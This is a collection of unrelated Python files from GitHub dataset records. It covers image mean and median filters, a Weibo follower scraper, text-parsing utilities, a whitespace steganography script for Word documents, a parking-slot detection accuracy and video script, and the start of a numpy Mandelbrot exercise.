new_img[x-1,y-1] = int(_nparr[x][y])\n render = ImageTk.PhotoImage(load1)\n img1.config(image = render)\n img1.image = render\n\ndef MeanFilter3x3():\n global load2,img2\n nparr = []\n dt = np.dtype(np.float64)\n\n for x in range(load2.size[0]):\n arr = []\n for y in range(load2.size[1]):\n arr.append(load2.getpixel((x, y)))\n nparr.append(arr.copy())\n nparr = np.array(nparr, dt)\n nparr = np.c_[nparr,np.zeros((load2.size[1],1))]\n nparr = np.c_[np.zeros((load2.size[1],1)),nparr]\n nparr = np.r_[np.zeros((1,load2.size[0]+2)),nparr]\n nparr = np.r_[nparr,np.zeros((1,load2.size[0]+2))]\n _nparr = nparr.copy()\n \n for x in range(1,load2.size[0]+1):\n for y in range(1,load2.size[1]+1):\n _nparr[x][y] = round((nparr[x][y]+nparr[x-1][y]+nparr[x+1][y]+nparr[x+1][y+1]+nparr[x-1][y-1]+nparr[x][y+1]+nparr[x][y-1]+nparr[x-1][y+1]+nparr[x+1][y-1])/9)\n\n new_img = load2.load()\n\n for x in range(1,load2.size[0]+1):\n for y in range(1,load2.size[1]+1):\n new_img[x-1,y-1] = int(_nparr[x][y])\n render = ImageTk.PhotoImage(load2)\n img2.config(image = render)\n img2.image = render\n\ndef MedianFilter7x7():\n global load3,img3\n nparr = []\n dt = np.dtype(np.float64)\n\n for x in range(load3.size[0]):\n arr = []\n for y in range(load3.size[1]):\n arr.append(load3.getpixel((x, y)))\n nparr.append(arr.copy())\n nparr = np.array(nparr, dt)\n\n nparr = np.c_[nparr,np.zeros((load3.size[1],3))]\n nparr = np.c_[np.zeros((load3.size[1],3)),nparr]\n nparr = np.r_[np.zeros((3,load3.size[0]+6)),nparr]\n nparr = np.r_[nparr,np.zeros((3,load3.size[0]+6))]\n\n _nparr = nparr.copy()\n \n for x in range(1,load3.size[0]+1):\n for y in range(1,load3.size[1]+1):\n temp = []\n for i in (0,1,-1,2,-2,3,-3):\n for j in (0,1,-1,2,-2,3,-3):\n temp.append(nparr[x+i][y+j])\n _nparr[x][y] = round(median(temp))\n\n new_img = load3.load()\n\n for x in range(1,load3.size[0]+1):\n for y in range(1,load3.size[1]+1):\n new_img[x-1,y-1] = int(_nparr[x][y])\n render = ImageTk.PhotoImage(load3)\n img3.config(image = render)\n img3.image = render\n\ndef MedianFilter3x3():\n global load4,img4\n nparr = []\n dt = np.dtype(np.float64)\n\n for x in range(load4.size[0]):\n arr = []\n for y in range(load4.size[1]):\n arr.append(load4.getpixel((x, y)))\n nparr.append(arr.copy())\n nparr = np.array(nparr, dt)\n nparr = np.c_[nparr,np.zeros((load4.size[1],1))]\n nparr = np.c_[np.zeros((load4.size[1],1)),nparr]\n nparr = np.r_[np.zeros((1,load4.size[0]+2)),nparr]\n nparr = np.r_[nparr,np.zeros((1,load4.size[0]+2))]\n _nparr = nparr.copy()\n \n for x in range(1,load4.size[0]+1):\n for y in range(1,load4.size[1]+1):\n _nparr[x][y] = round(median([nparr[x][y],nparr[x-1][y],nparr[x+1][y],nparr[x+1][y+1],nparr[x-1][y-1],nparr[x][y+1],nparr[x][y-1],nparr[x-1][y+1],nparr[x+1][y-1]]))\n\n new_img = load4.load()\n\n for x in range(1,load4.size[0]+1):\n for y in range(1,load4.size[1]+1):\n new_img[x-1,y-1] = int(_nparr[x][y])\n render = ImageTk.PhotoImage(load4)\n img4.config(image = render)\n img4.image = render\n\ndef Question1():\n global window, render\n window = tkinter.Tk()\n window.title(\"Hw 3-1\")\n\n LoadPicture()\n MeanFilter7x7()\n MeanFilter3x3()\n MedianFilter7x7()\n MedianFilter3x3()\n\n title = tkinter.Label(window, text = \"Origin\", font=(\"Arial\",18))\n title1 = tkinter.Label(window, text = \"7x7 arithmetic mean filter\", font=(\"Arial\",18))\n title2 = tkinter.Label(window, text = \"3x3 arithmetic mean filter\", font=(\"Arial\",18))\n title3 = tkinter.Label(window, text = \"7x7 median filter\", font=(\"Arial\",18))\n title4 = tkinter.Label(window, text = \"3x3 median filter\", font=(\"Arial\",18))\n title.grid(row=0,column=1,padx=10,pady=2)\n title1.grid(row=0,column=2,padx=10,pady=2)\n title2.grid(row=0,column=3,padx=10,pady=2)\n title3.grid(row=0,column=4,padx=10,pady=2)\n title4.grid(row=0,column=5,padx=10,pady=2)\n img.grid(row=1,column=1,padx=10,pady=2)\n img1.grid(row=1,column=2,padx=10,pady=2)\n img2.grid(row=1,column=3,padx=10,pady=2)\n img3.grid(row=1,column=4,padx=10,pady=2)\n img4.grid(row=1,column=5,padx=10,pady=2)\n\n # size control\n window.geometry('1620x400')\n window.mainloop()\n\nif __name__ == '__main__':\n Question1()","repo_name":"eric100789/CSE_DIP","sub_path":"homework3/hw3_1.py","file_name":"hw3_1.py","file_ext":"py","file_size_in_byte":6698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73474939928","text":"import json\n\nimport scrapy\n\nfrom wbspider.items import WbspiderItem\n\n\nclass WboItem(scrapy.spiders.Spider):\n name = 'weibo'\n start_urls = ['https://m.weibo.cn/api/container/getIndex?containerid=231051_-_followers_-_3261134763_-_1042015%253AtagCategory_050&luicode=10000011&lfid=1076033261134763', ]\n\n def parse(self, response):\n item = WbspiderItem()\n msg = json.loads(response.text)\n users_msg = []\n for i in range(len(msg['data']['cards'])-1):\n for users in msg['data']['cards'][i]['card_group'][1]['users']:\n users_msg.append(users)\n for j in range(len(msg['data']['cards'][3]['card_group'])):\n users_msg.append(msg['data']['cards'][3]['card_group'][j]['user'])\n _id = []\n screen_name = []\n profile_image_url = []\n profile_url = []\n followers_count = []\n follow_count = []\n cover_image_phone = []\n for user in users_msg:\n _id.append(user['id'])\n screen_name.append(user['screen_name'])\n profile_image_url.append(user['profile_image_url'])\n profile_url.append(user['profile_url'])\n followers_count.append(user['followers_count'])\n follow_count.append(user['follow_count'])\n cover_image_phone.append(user['cover_image_phone'])\n\n item['_id'] = _id\n item['screen_name'] = screen_name\n item['profile_image_url'] = profile_image_url\n item['profile_url'] = profile_url\n item['followers_count'] = followers_count\n item['follow_count'] = follow_count\n item['cover_image_phone'] = cover_image_phone\n return dict(item)\n\n","repo_name":"ZhouForrest/flask_projects","sub_path":"wbspider/wbspider/spiders/weibo.py","file_name":"weibo.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71542871128","text":"import numpy as np\n\n# Takes input directly from fo.readlines()\ndef parse(text, punc=1):\n text = [line.lower() for line in text]\n delimiters = ['\\n', '.', ',', '!', ':', ';', '\"', '?', '-', '(', ')', '*' ,'[', ']', '_']\n wordlist = []\n # Puts all lines in one giant list\n lines = []\n for line in text:\n lines.append(line)\n # Extracts words, separated by space, from all lines\n for line in lines:\n words = list(line.split())\n for word in words:\n wordlist.append(word)\n # wordlist.append('\\n')\n # Parses the list of words from above by each delimiter\n for delimiter in delimiters:\n old_wordlist = wordlist\n wordlist = []\n for word in old_wordlist:\n if word.find(delimiter) is not -1:\n word2 = list(word.split(delimiter))\n for word in word2:\n wordlist.append(word)\n if punc == 1:\n wordlist.append(delimiter)\n else:\n wordlist.append(word)\n\n # Removes \"empty\" words\n wordlist = [x for x in wordlist if x != '']\n # Saves the parsed text (order preserving)\n text_parsed = wordlist\n # Appends delimiters to word list\n if punc == 1:\n for delimiter in delimiters:\n wordlist.append(delimiter)\n return sorted(list(set(wordlist))), text_parsed\n\ndef sample(preds, temperature=1.0):\n # helper function to sample an index from a probability array\n preds = np.asarray(preds).astype('float64')\n preds = np.log(preds) / temperature\n exp_preds = np.exp(preds)\n preds = exp_preds / np.sum(exp_preds)\n probas = np.random.multinomial(1, preds, 1)\n return np.argmax(probas)","repo_name":"eshn/MCSC6230_LSTM","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1620160769","text":"from docx import Document\r\n\r\nutf_check = [0x0020, 0x2004, 0x2005, 0x2006, 0x2007, 0x2009, 0x200A, 0x2008, 0x202F]\r\n\r\ncode_check = chr(0x0020)+chr(0x2004)+chr(0x2005)+chr(0x2006)+chr(0x2007)+chr(0x2009)+chr(0x200A)+chr(0x2008)+chr(0x202F)\r\n\r\ncode_table = {\r\n \"0000\" : chr(0x202F)+chr(0x0020),\r\n \"0001\" : chr(0x0020)+chr(0x2004),\r\n \"0010\" : chr(0x2004)+chr(0x0020),\r\n \"0011\" : chr(0x0020)+chr(0x2005),\r\n \"0100\" : chr(0x2005)+chr(0x0020),\r\n \"0101\" : chr(0x0020)+chr(0x2006),\r\n \"0110\" : chr(0x2006)+chr(0x0020),\r\n \"0111\" : chr(0x0020)+chr(0x2007),\r\n \"1000\" : chr(0x2007)+chr(0x0020),\r\n \"1001\" : chr(0x0020)+chr(0x2009),\r\n \"1010\" : chr(0x2009)+chr(0x0020),\r\n \"1011\" : chr(0x0020)+chr(0x200A),\r\n \"1100\" : chr(0x200A)+chr(0x0020),\r\n \"1101\" : chr(0x0020)+chr(0x2008),\r\n \"1110\" : chr(0x2008)+chr(0x0020),\r\n \"1111\" : chr(0x0020)+chr(0x202F),\r\n}\r\n\r\nreversed_code_table = {\r\n chr(0x202F) + chr(0x0020): \"0000\",\r\n chr(0x0020) + chr(0x2004): \"0001\",\r\n chr(0x2004) + chr(0x0020): \"0010\",\r\n chr(0x0020) + chr(0x2005): \"0011\",\r\n chr(0x2005) + chr(0x0020): \"0100\",\r\n chr(0x0020) + chr(0x2006): \"0101\",\r\n chr(0x2006) + chr(0x0020): \"0110\",\r\n chr(0x0020) + chr(0x2007): \"0111\",\r\n chr(0x2007) + chr(0x0020): \"1000\",\r\n chr(0x0020) + chr(0x2009): \"1001\",\r\n chr(0x2009) + chr(0x0020): \"1010\",\r\n chr(0x0020) + chr(0x200A): \"1011\",\r\n chr(0x200A) + chr(0x0020): \"1100\",\r\n chr(0x0020) + chr(0x2008): \"1101\",\r\n chr(0x2008) + chr(0x0020): \"1110\",\r\n chr(0x0020) + chr(0x202F): \"1111\"\r\n}\r\n\r\ndef text_to_binary_string(file_path):\r\n try:\r\n with open(file_path, 'r') as file:\r\n text = file.read()\r\n binary_data = bytes(text, 'utf-8')\r\n binary_string = ''.join(format(byte, '08b') for byte in binary_data)\r\n if len(binary_string) % 4 != 0:\r\n binary_string += '0' * (len(binary_string) % 4)\r\n return binary_string\r\n except FileNotFoundError:\r\n return \"File not found\"\r\n except Exception as e:\r\n return f\"An error occurred: {str(e)}\"\r\n\r\ndef binary_to_spaces(biner):\r\n spaces = \"\"\r\n while biner != \"\":\r\n spaces += code_table[biner[:4]]\r\n biner = biner[4:]\r\n return spaces\r\n\r\ndef count_spaces(docx_file_path):\r\n counter = 0\r\n doc = Document(docx_file_path)\r\n for paragraph in doc.paragraphs:\r\n for run in paragraph.runs:\r\n for char in run.text:\r\n if char in code_check:\r\n counter += 1\r\n return counter\r\n\r\ndef replace_spaces(docx_file_path, biner):\r\n doc = Document(docx_file_path)\r\n binary_index = 0\r\n\r\n for paragraph in doc.paragraphs:\r\n for run in paragraph.runs:\r\n text = run.text\r\n new_text = \"\"\r\n for char in text:\r\n if char == ' ':\r\n if binary_index < len(biner):\r\n new_text += code_table[biner[binary_index:binary_index + 4]]\r\n binary_index += 4\r\n else:\r\n new_text += ' '\r\n else:\r\n new_text += char\r\n\r\n run.text = new_text\r\n\r\n doc.save(docx_file_path)\r\n\r\ndef read_spaces(docx_file_path):\r\n decode = \"\"\r\n code_check_set = set(code_check)\r\n doc = Document(docx_file_path)\r\n for paragraph in doc.paragraphs:\r\n for run in paragraph.runs:\r\n for char in run.text:\r\n if char in code_check_set:\r\n decode += char\r\n \r\n\r\n return decode\r\n\r\ndef spaces_to_binary(input_string):\r\n binary_string = \"\"\r\n\r\n while(input_string != \"\"):\r\n if (input_string[:2] in reversed_code_table):\r\n binary_string += reversed_code_table[input_string[:2]]\r\n input_string = input_string[2:]\r\n return binary_string\r\n\r\ndef binary_to_text(binary_string):\r\n binary_chunks = [binary_string[i:i+8] for i in range(0, len(binary_string), 8)]\r\n word_string = \"\".join([chr(int(chunk, 2)) for chunk in binary_chunks])\r\n return word_string\r\n\r\ndef encrypt(txt_file, word_file):\r\n biner = text_to_binary_string(txt_file)\r\n\r\n if (count_spaces(word_file) < (len(biner)/4)):\r\n print(\"Too short word file\")\r\n return\r\n\r\n \r\n replace_spaces(word_file, biner)\r\n return\r\n\r\n\r\ndef decrypt(word_file):\r\n decode = read_spaces(word_file)\r\n bindec = spaces_to_binary(decode)\r\n finito = binary_to_text(bindec)\r\n print(finito)\r\n return","repo_name":"GuessWho07/Text-Steganography-App","sub_path":"space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":4494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23049817210","text":"import numpy as np\nimport os\nimport cv2\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\n# 计算四个点的预测点与真值点之间的误差\n\n\ndef get_acc(y, y_hat, dis, img_path):\n total = 0\n for i in range(2):\n total += ((int(y[i][0])-int(y_hat[i][0]))**2 +\n (int(y[i][1])-int(y_hat[i][1]))**2)**0.5\n total /= 2\n\n f = os.path.basename(img_path)\n\n save_path = os.path.join(\n error_dir, f)\n read_path = os.path.join(\n mark_img_1024_dir, f)\n img = cv2.imread(read_path)\n\n if total > 5:\n cv2.imwrite(save_path, img)\n\n if total <= dis:\n return 1\n else:\n return 0\n\n# 保存坐标点函数\n\n\ndef save_point(point, point_path):\n with open(point_path, \"w\") as f:\n for k in range(4):\n f.write(str(point[k][0]))\n f.write(' ')\n f.write(str(point[k][1]))\n f.write('\\n')\n\n# 转换坐标,标点\n\n\ndef colorize_pic(src_img_1024_path, point_pred_256_path,\n trans_inv_path, mark_img_1024_path, point_256_gt_path, point_pred_1024_path, point_gt_1024_path):\n\n # 读原图\n img_pred = cv2.imread(src_img_1024_path)\n point_pred = []\n trans_inv = []\n # 测试图片的预测点在256*256图片的坐标\n point_pred = np.loadtxt(point_pred_256_path)\n\n # 256*256图片到原图的转换矩阵\n trans_inv = np.loadtxt(trans_inv_path)\n\n trans_inv = trans_inv.reshape(2, 3)\n trans_inv = np.mat(trans_inv)\n\n # 把256*256中的点投影到原图上\n # dst = cv2.perspectiveTransform(point_pred, trans_inv)\n column = np.array([1, 1, 1, 1])\n point_pred = np.column_stack((point_pred, column))\n point_pred = point_pred.T\n # dst = cv2.perspectiveTransform(mat, trans_inv)\n dst = np.dot(trans_inv, point_pred)\n dst = dst.T\n # print(\"dst\", dst)\n\n point_size = 1\n thickness = 4\n # 红色\n point_color = (0, 0, 255)\n point_color2 = (0, 255, 0)\n\n # 把点画在图上\n # 原图中点的坐标\n point = np.loadtxt(point_256_gt_path)\n point = np.column_stack((point, column))\n point = point.T\n p = np.dot(trans_inv, point)\n p = p.T\n p = np.asarray(p)\n\n for i in range(4):\n if i < 3:\n img_pred = cv2.line(img_pred, (int(p[i][0]), int(p[i][1])),\n (int(p[i+1][0]), int(p[i+1][1])), (0, 0, 255), 3, 8)\n else:\n img_pred = cv2.line(img_pred, (int(p[i][0]), int(p[i][1])),\n (int(p[0][0]), int(p[0][1])), (0, 0, 255), 3, 8)\n\n # for i in range(4):\n # cv2.circle(img_pred, (int(p[i][0]), int(p[i][1])),\n # point_size, point_color2, thickness)\n\n # gt\n # annt = np.loadtxt(point_gt_1024_path)\n # for i in range(4):\n # cv2.circle(img_pred, (int(annt[i][0]), int(annt[i][1])),\n # point_size, point_color, thickness)\n\n # dst = dst.reshape(2, 2)\n dst = np.asarray(dst)\n\n # for i in range(4):\n # cv2.circle(img_pred, (int(dst[i][0]), int(dst[i][1])),\n # point_size, point_color, thickness)\n\n cv2.imwrite(mark_img_1024_path, img_pred)\n\n save_point(dst, point_pred_1024_path)\n save_point(p, point_gt_1024_path)\n\n# 转换坐标,计算单个图片的精度\n\n\ndef pic_accuracy(src_img_1024_path, pix, point_pred_1024_path, point_gt_1024_path):\n # 读原图\n point_pred = []\n # 测试图片的预测点在256*256图片的坐标\n point_pred = np.loadtxt(point_pred_1024_path)\n\n gt = np.loadtxt(point_gt_1024_path)\n\n tmp = get_acc(point_pred, gt, pix, src_img_1024_path)\n\n return tmp\n\n# 求测试集的预测点到原图中的精度\n\n\ndef get_accuracy(pix):\n accuracy = 0\n for i in os.listdir(mark_test_img_256_dir):\n src_img_1024_path = os.path.join(src_img_1024_dir, i)\n point_pred_1024_path = os.path.join(\n point_pred_1024_dir, i.strip('.jpg')+'.txt')\n point_gt_1024_path = os.path.join(\n point_gt_1024_dir, i.strip('.jpg')+'.txt')\n tmp = pic_accuracy(src_img_1024_path, pix,\n point_pred_1024_path, point_gt_1024_path)\n accuracy += tmp\n return accuracy\n\n\n# 计算两点与原点的夹角\n\ndef azimuthAngle(x1, y1, x2, y2):\n angle = math.atan2((y2-y1), (x2-x1))\n return (angle * 180 / math.pi)\n\n# 计算角偏差,求精度\n\n\ndef get_angle_acc(point_pred_1024_path, point_1024_gt_path, pix):\n point_pred = np.loadtxt(point_pred_1024_path)\n point_gt = np.loadtxt(point_1024_gt_path)\n vec = [[0]*3] * 5\n vec_gt = [[0]*3] * 5\n for w in range(4):\n vec[w] = np.array([point_pred[w][0],\n point_pred[w][1]])\n vec_gt[w] = np.array([point_gt[w][0],\n point_gt[w][1]])\n\n vector1 = vec[2]-vec[0]\n vector2 = vec[3]-vec[1]\n vector_norm1 = vector1/np.linalg.norm(vector1)\n vector_norm2 = vector2/np.linalg.norm(vector2)\n vector_end1 = vec[0]+vector_norm1*50\n vector_end2 = vec[1]+vector_norm2*50\n\n vector1_gt = vec_gt[2]-vec_gt[0]\n vector2_gt = vec_gt[3]-vec_gt[1]\n vector_norm1_gt = vector1_gt/np.linalg.norm(vector1_gt)\n vector_norm2_gt = vector2_gt/np.linalg.norm(vector2_gt)\n vector_end1_gt = vec_gt[0]+vector_norm1_gt*20\n vector_end2_gt = vec_gt[1]+vector_norm2_gt*20\n\n angle1 = azimuthAngle(vec[0][0], vec[0][1],\n vector_end1[0], vector_end1[1])\n\n angle1_gt = azimuthAngle(vec_gt[0][0], vec_gt[0][1],\n vector_end1_gt[0], vector_end1_gt[1])\n\n angle2 = azimuthAngle(vec[1][0], vec[1][1],\n vector_end2[0], vector_end2[1])\n angle2_gt = azimuthAngle(vec_gt[1][0], vec_gt[1][1],\n vector_end2_gt[0], vector_end2_gt[1])\n # print(angle1)\n # print(angle1_gt)\n\n total = abs(angle1-angle1_gt)+abs(angle2-angle2_gt)\n\n total /= 2\n\n if total <= pix:\n return 1\n else:\n return 0\n\n# 绘制箭头\n\n\ndef cvArrow(img, pt1, pt2, imgPath):\n img = cv2.arrowedLine(img, (int(pt1[0]), int(pt1[1])),\n (int(pt2[0]), int(pt2[1])), (0, 0, 255), 3, 8, 0, 0.1)\n cv2.imwrite(imgPath, img)\n\n# 画方向\n\n\ndef draw_angle(img_path, point_path):\n point_pred = np.loadtxt(point_path)\n img = cv2.imread(img_path)\n vec = [[0]*3] * 5\n for w in range(4):\n vec[w] = np.array([point_pred[w][0],\n point_pred[w][1]])\n vector1 = vec[3]-vec[0]\n vector2 = vec[2]-vec[1]\n vector_norm1 = vector1/np.linalg.norm(vector1)\n vector_norm2 = vector2/np.linalg.norm(vector2)\n vector_end1 = vec[0]+vector_norm1*200\n vector_end2 = vec[1]+vector_norm2*200\n # print(vector_end1)\n cvArrow(img, vec[0], vector_end1, img_path)\n cvArrow(img, vec[1], vector_end2, img_path)\n\n\nif __name__ == \"__main__\":\n\n # 测试数据集的准确度\n # ************************************************************************************************************************\n\n # trans_inv_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/trans_256To1024\"\n # src_img_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/img_1024_with_rectangle\"\n # # annt_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/annt_1024_singleSlot\"\n # mark_img_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/fina\"\n\n # point_256_gt_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/annt_256\"\n # point_pred_256_dir = \"/media/home_bak/ziqi/park/stackedHourglass_256/point_pred_256\"\n # mark_test_img_256_dir = \"/media/home_bak/ziqi/park/stackedHourglass_256/mark_test_img_256\"\n\n # error_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/error_img\"\n # point_pred_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/point_pred_1024\"\n # point_gt_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/annt_1024_singleSlot\"\n\n # 训练数据集的准确度\n # ************************************************************************************************************************\n\n # trans_inv_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/trans_256To1024\"\n # src_img_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/img_1024_with_rectangle\"\n # # annt_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/annt_1024_singleSlot\"\n # mark_img_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/fina\"\n\n # point_256_gt_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/annt_256\"\n # point_pred_256_dir = \"/media/home_bak/ziqi/park/stackedHourglass_256/point_pred_256\"\n # mark_test_img_256_dir = \"/media/home_bak/ziqi/park/stackedHourglass_256/mark_test_img_256\"\n\n # error_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/error_img\"\n # point_pred_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/point_pred_1024\"\n # point_gt_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_TrainingDaraSet_All/annt_1024_singleSlot\"\n\n # for i in os.listdir(mark_test_img_256_dir):\n # point_pred_256_path = os.path.join(\n # point_pred_256_dir, i.strip('.jpg')+'.txt')\n # src_img_1024_path = os.path.join(src_img_1024_dir, i)\n # trans_inv_path = os.path.join(trans_inv_dir, i.strip('.jpg')+'.txt')\n # mark_img_1024_path = os.path.join(mark_img_1024_dir, i)\n # point_256_gt_path = os.path.join(\n # point_256_gt_dir, i.strip('.jpg')+'_OA.txt')\n # point_pred_1024_path = os.path.join(\n # point_pred_1024_dir, i.strip('.jpg')+'.txt')\n # point_gt_1024_path = os.path.join(\n # point_gt_1024_dir, i.strip('.jpg')+'.txt')\n\n # colorize_pic(src_img_1024_path, point_pred_256_path,\n # trans_inv_path, mark_img_1024_path, point_256_gt_path, point_pred_1024_path, point_gt_1024_path)\n # draw_angle(mark_img_1024_path, point_pred_1024_path)\n # acc = []\n # accuracy_angle = [0 for j in range(10)]\n # for k in range(15):\n # x1 = get_accuracy(k)\n # x1 = 100 * x1 / 6313\n # x1 = round(x1, 3)\n # acc.append(x1)\n\n # print(\"acc\", acc)\n\n # 计算1024*1024图片上角度的精度\n # for pix in range(10):\n # for c in os.listdir(mark_test_img_256_dir):\n # point_pred_1024_path = os.path.join(\n # point_pred_1024_dir, c.strip('.jpg')+'.txt')\n # point_gt_1024_path = os.path.join(\n # point_gt_1024_dir, c.strip('.jpg')+'.txt')\n # tmp = get_angle_acc(point_pred_1024_path, point_gt_1024_path, pix)\n # accuracy_angle[pix] += tmp\n\n # for y in range(10):\n # accuracy_angle[y] = 100 * accuracy_angle[y] / 6313\n # accuracy_angle[y] = round(accuracy_angle[y], 3)\n\n # print(\"accuracy_angle:\", accuracy_angle)\n\n # x1 = round(x1, 3)\n # print(acc)\n\n # 测试视频的准确度\n # ************************************************************************************************************************\n\n trans_inv_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/trans_256To1024\"\n src_img_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/img_1024_with_rectangle\"\n mark_img_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/fina\"\n\n point_256_gt_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/annt_256\"\n point_pred_256_dir = \"/media/home_bak/ziqi/park/stackedHourglass_256/PLD_BirdView_20201219152720-00-00/point_pred_256\"\n mark_test_img_256_dir = \"/media/home_bak/ziqi/park/stackedHourglass_256/PLD_BirdView_20201219152720-00-00/mark_test_img_256\"\n\n point_pred_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/point_pred_1024\"\n point_gt_1024_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/annt_1024_singleSlot\"\n video_img_dir = \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/20201219152720-00-00.MP4\"\n\n # for i in os.listdir(mark_test_img_256_dir):\n # point_pred_256_path = os.path.join(\n # point_pred_256_dir, i.strip('.jpg')+'.txt')\n # src_img_1024_path = os.path.join(src_img_1024_dir, i)\n # trans_inv_path = os.path.join(trans_inv_dir, i.strip('.jpg')+'.txt')\n # mark_img_1024_path = os.path.join(mark_img_1024_dir, i)\n # point_256_gt_path = os.path.join(\n # point_256_gt_dir, i.strip('.jpg')+'_OA.txt')\n # point_pred_1024_path = os.path.join(\n # point_pred_1024_dir, i.strip('.jpg')+'.txt')\n # point_gt_1024_path = os.path.join(\n # point_gt_1024_dir, i.strip('.jpg')+'.txt')\n # colorize_pic(src_img_1024_path, point_pred_256_path,\n # trans_inv_path, mark_img_1024_path, point_256_gt_path, point_pred_1024_path, point_gt_1024_path)\n\n # for j in sorted(os.listdir(point_pred_1024_dir)):\n # tmp = j\n # pred_point = tmp.split('_')\n # pred = pred_point[0]+'_'+pred_point[1]\n # # print(pred)\n # video_img_path = os.path.join(video_img_dir, pred+'.jpg')\n # # print(video_img_path)\n # img_pred = cv2.imread(video_img_path)\n # point_pred_1024_path = os.path.join(point_pred_1024_dir, j)\n # point = np.loadtxt(point_pred_1024_path)\n # for k in range(4):\n # if k < 3:\n # video_img = cv2.line(img_pred, (int(point[k][0]), int(point[k][1])),\n # (int(point[k+1][0]), int(point[k+1][1])), (0, 0, 255), 3, 8)\n # else:\n # video_img = cv2.line(img_pred, (int(point[k][0]), int(point[k][1])),\n # (int(point[0][0]), int(point[0][1])), (0, 0, 255), 3, 8)\n # cv2.imwrite(video_img_path, video_img)\n\n # output video path\n video_dir = '/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_20201219152720-00-00/demo'\n if not os.path.exists(video_dir):\n os.makedirs(video_dir)\n # set saved fps\n fps = 30\n img_size = (1024, 1024)\n # get seq name\n seq_name = os.path.dirname(video_img_dir).split('_')[-1]\n # splice video_dir\n video_dir = os.path.join(video_dir, seq_name + '.avi')\n fourcc = cv2.VideoWriter_fourcc('I', '4', '2', '0')\n videowriter = cv2.VideoWriter(video_dir, fourcc, fps, img_size)\n\n for img in range(801,len(os.listdir(video_img_dir))):\n img = '{}_{}.jpg'.format(video_img_dir.split('/')[-1], img)\n img1 = cv2.imread(os.path.join(video_img_dir, img))\n videowriter.write(img1)\n\n videowriter.release()\n\n # # 设置画布大小\n # plt.figure(figsize=(30, 15))\n\n # # 标题\n # plt.title(\"accruracy distribution\")\n\n # # 数据\n # plt.bar(range(len(acc)), acc)\n\n # # 横坐标描述\n # plt.xlabel('pixel')\n\n # # 纵坐标描述\n # plt.ylabel('accuracy')\n\n # plt.savefig(\n # \"/media/home_bak/ziqi/park/Ps_locate_dataset/PLD_BirdView_Training_TestSet_v1.0.7_All_3342/accuracy.png\")\n","repo_name":"ziqi123/AutoParking","sub_path":"accuracy_PAF.py","file_name":"accuracy_PAF.py","file_ext":"py","file_size_in_byte":15748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40842136176","text":"\"\"\"\nMake a similar script to 4.1 so that all computationally heavy bits use numpy\narrays. Compare the runtime on some input of your choosing. How much is\ngained by switching to numpy?\n\"\"\"\n#!/usr/bin/env python\n\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n \n# takes the fixed parameter c and the maximum number of iterations as inputs\ndef mandel2(c, maxIterations):\n output = np.zeros(c.shape)\n \n # Start value of complex z\n z = np.zeros(c.shape, np.complex64)\n \n # start iterating and stop when maxIterations\n for iteration in range(maxIterations):\n # check if the output complex number z is bigger than 2, if so save in notdone\n notdone = np.less(z.real*z.real + z.imag*z.imag, 2.0)\n \n # assignes iteration to alle the elements of output where where the corresponding of notdone is True\n output[notdone] = iteration\n \n # generates the output value of z\n z[notdone] = z[notdone]**2 + c[notdone]\n output[output == maxIterations-1] = 0\n return output\n \ndef mandelbrot2(xmin, xmax, ymin, ymax):\n # Rectangle location, datatype and size \n xvalues = np.linspace(xmin, xmax, 